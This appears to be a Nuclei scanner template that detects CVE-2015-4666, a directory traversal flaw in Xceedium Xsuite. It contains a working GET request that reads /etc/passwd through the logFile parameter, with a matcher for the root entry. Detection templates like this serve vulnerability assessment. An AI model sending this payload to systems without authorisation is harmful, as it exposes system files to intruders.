id: CVE-2015-4666 info: name: Xceedium Xsuite 2.4.4.5 - Directory Traversal author: 0x_Akoko severity: high description: Directory traversal vulnerability in opm/read_sessionlog.php in Xceedium Xsuite 2.4.4.5 and earlier allows remote attackers to read arbitrary files in the logFile parameter. reference: - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt - https://www.cvedetails.com/cve/CVE-2015-4666 - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html - http://www.modzero.ch/advisories/MZ-15-02-Xceedium-Xsuite.txt classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-4666 cwe-id: CWE-22 tags: cve,cve2015,xceedium,xsuite,lfi requests: - method: GET path: - "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200